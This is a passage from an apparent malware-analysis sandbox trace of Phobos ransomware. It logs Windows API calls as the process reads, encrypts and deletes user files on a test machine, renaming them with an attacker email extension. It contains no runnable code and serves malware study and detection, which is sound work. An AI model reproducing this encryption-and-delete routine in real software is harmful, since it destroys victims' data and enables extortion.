hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x12260, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x12260, lpOverlapped=0x0) returned 1 [0196.054] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c68) returned 1 [0196.054] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.054] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60, dwBufLen=0x60 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60) returned 1 [0196.054] CryptDestroyKey (hKey=0xa32c68) returned 1 [0196.054] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x112, lpOverlapped=0x0) returned 1 [0196.054] CryptDestroyKey (hKey=0xa32be8) returned 1 [0196.054] CloseHandle (hObject=0xb8) returned 1 [0196.054] CloseHandle (hObject=0xac) returned 1 [0196.055] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\t8p1dXbkwgDxC62lGDzr.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\t8p1dxbkwgdxc62lgdzr.jpg")) returned 1 [0196.056] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0196.056] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ta4mOSmjLg.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ta4mosmjlg.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0196.057] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=53874) returned 1 [0196.057] CloseHandle (hObject=0xac) returned 1 [0196.057] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ta4mOSmjLg.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ta4mosmjlg.mp3")) returned 0x20 [0196.057] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ta4mOSmjLg.mp3.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ta4mosmjlg.mp3.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.057] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ta4mOSmjLg.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ta4mosmjlg.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0196.057] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.057] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.058] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ta4mOSmjLg.mp3.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ta4mosmjlg.mp3.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0196.058] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0196.058] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.058] ReadFile (in: hFile=0xac, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xd272, lpOverlapped=0x0) returned 1 [0196.061] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd280, dwBufLen=0xd280 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd280) returned 1 [0196.061] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xd280, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xd280, lpOverlapped=0x0) returned 1 [0196.063] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c68) returned 1 [0196.063] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.063] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0196.063] CryptDestroyKey (hKey=0xa32c68) returned 1 [0196.063] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0196.063] CryptDestroyKey (hKey=0xa32be8) returned 1 [0196.063] CloseHandle (hObject=0xac) returned 1 [0196.063] CloseHandle (hObject=0xb8) returned 1 [0196.064] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ta4mOSmjLg.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ta4mosmjlg.mp3")) returned 1 [0196.065] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0196.065] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ThKXNc1XT.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\thkxnc1xt.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0196.066] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=61114) returned 1 [0196.066] CloseHandle (hObject=0xb8) returned 1 [0196.066] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ThKXNc1XT.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\thkxnc1xt.bmp")) returned 0x20 [0196.066] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ThKXNc1XT.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\thkxnc1xt.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.066] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ThKXNc1XT.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\thkxnc1xt.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0196.066] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.066] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.066] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ThKXNc1XT.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\thkxnc1xt.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0196.067] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0196.067] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.067] ReadFile (in: hFile=0xb8, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xeeba, lpOverlapped=0x0) returned 1 [0196.118] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xeec0, dwBufLen=0xeec0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xeec0) returned 1 [0196.118] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xeec0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xeec0, lpOverlapped=0x0) returned 1 [0196.120] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c68) returned 1 [0196.120] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.120] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0196.120] CryptDestroyKey (hKey=0xa32c68) returned 1 [0196.120] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0196.120] CryptDestroyKey (hKey=0xa32be8) returned 1 [0196.120] CloseHandle (hObject=0xb8) returned 1 [0196.121] CloseHandle (hObject=0xac) returned 1 [0196.121] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ThKXNc1XT.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\thkxnc1xt.bmp")) returned 1 [0196.122] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0196.122] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0fkEaIWh1k-ezLz_8.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0fkeaiwh1k-ezlz_8.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0196.123] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=11990) returned 1 [0196.123] CloseHandle (hObject=0xac) returned 1 [0196.123] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0fkEaIWh1k-ezLz_8.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0fkeaiwh1k-ezlz_8.xlsx")) returned 0x20 [0196.123] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0fkEaIWh1k-ezLz_8.xlsx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0fkeaiwh1k-ezlz_8.xlsx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.123] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0fkEaIWh1k-ezLz_8.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0fkeaiwh1k-ezlz_8.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0196.123] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.123] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.124] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0fkEaIWh1k-ezLz_8.xlsx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0fkeaiwh1k-ezlz_8.xlsx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0196.124] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0196.124] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.124] ReadFile (in: hFile=0xac, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2ed6, lpOverlapped=0x0) returned 1 [0196.126] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2ee0, dwBufLen=0x2ee0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2ee0) returned 1 [0196.126] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2ee0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2ee0, lpOverlapped=0x0) returned 1 [0196.127] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c68) returned 1 [0196.127] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.127] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0196.127] CryptDestroyKey (hKey=0xa32c68) returned 1 [0196.127] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0196.127] CryptDestroyKey (hKey=0xa32be8) returned 1 [0196.127] CloseHandle (hObject=0xac) returned 1 [0196.127] CloseHandle (hObject=0xb8) returned 1 [0196.127] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0fkEaIWh1k-ezLz_8.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0fkeaiwh1k-ezlz_8.xlsx")) returned 1 [0196.128] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0196.129] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\8h3ImrKNTgE0g\\i_1YLNTeDDRTI6iyC.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\8h3imrkntge0g\\i_1ylnteddrti6iyc.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0196.130] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=77697) returned 1 [0196.130] CloseHandle (hObject=0xb8) returned 1 [0196.130] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\8h3ImrKNTgE0g\\i_1YLNTeDDRTI6iyC.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\8h3imrkntge0g\\i_1ylnteddrti6iyc.docx")) returned 0x20 [0196.130] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\8h3ImrKNTgE0g\\i_1YLNTeDDRTI6iyC.docx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\8h3imrkntge0g\\i_1ylnteddrti6iyc.docx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\8h3ImrKNTgE0g\\i_1YLNTeDDRTI6iyC.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\8h3imrkntge0g\\i_1ylnteddrti6iyc.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0196.130] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.130] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\8h3ImrKNTgE0g\\i_1YLNTeDDRTI6iyC.docx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\8h3imrkntge0g\\i_1ylnteddrti6iyc.docx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0196.131] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0196.132] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.132] ReadFile (in: hFile=0xb8, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x12f81, lpOverlapped=0x0) returned 1 [0196.139] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x12f90, dwBufLen=0x12f90 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x12f90) returned 1 [0196.139] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x12f90, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x12f90, lpOverlapped=0x0) returned 1 [0196.141] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c68) returned 1 [0196.141] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.141] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0196.141] CryptDestroyKey (hKey=0xa32c68) returned 1 [0196.141] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0196.141] CryptDestroyKey (hKey=0xa32be8) returned 1 [0196.141] CloseHandle (hObject=0xb8) returned 1 [0196.141] CloseHandle (hObject=0xac) returned 1 [0196.141] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\8h3ImrKNTgE0g\\i_1YLNTeDDRTI6iyC.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\8h3imrkntge0g\\i_1ylnteddrti6iyc.docx")) returned 1 [0196.143] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0196.143] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\8h3ImrKNTgE0g\\XsP7HX.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\8h3imrkntge0g\\xsp7hx.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0196.144] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=75380) returned 1 [0196.144] CloseHandle (hObject=0xac) returned 1 [0196.144] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\8h3ImrKNTgE0g\\XsP7HX.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\8h3imrkntge0g\\xsp7hx.doc")) returned 0x20 [0196.145] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\8h3ImrKNTgE0g\\XsP7HX.doc.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\8h3imrkntge0g\\xsp7hx.doc.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.145] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\8h3ImrKNTgE0g\\XsP7HX.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\8h3imrkntge0g\\xsp7hx.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0196.145] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.145] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.145] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\8h3ImrKNTgE0g\\XsP7HX.doc.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\8h3imrkntge0g\\xsp7hx.doc.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0196.145] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0196.145] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.145] ReadFile (in: hFile=0xac, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x12674, lpOverlapped=0x0) returned 1 [0196.147] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x12680, dwBufLen=0x12680 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x12680) returned 1 [0196.147] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x12680, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x12680, lpOverlapped=0x0) returned 1 [0196.149] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c68) returned 1 [0196.149] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.149] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0196.149] CryptDestroyKey (hKey=0xa32c68) returned 1 [0196.149] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | 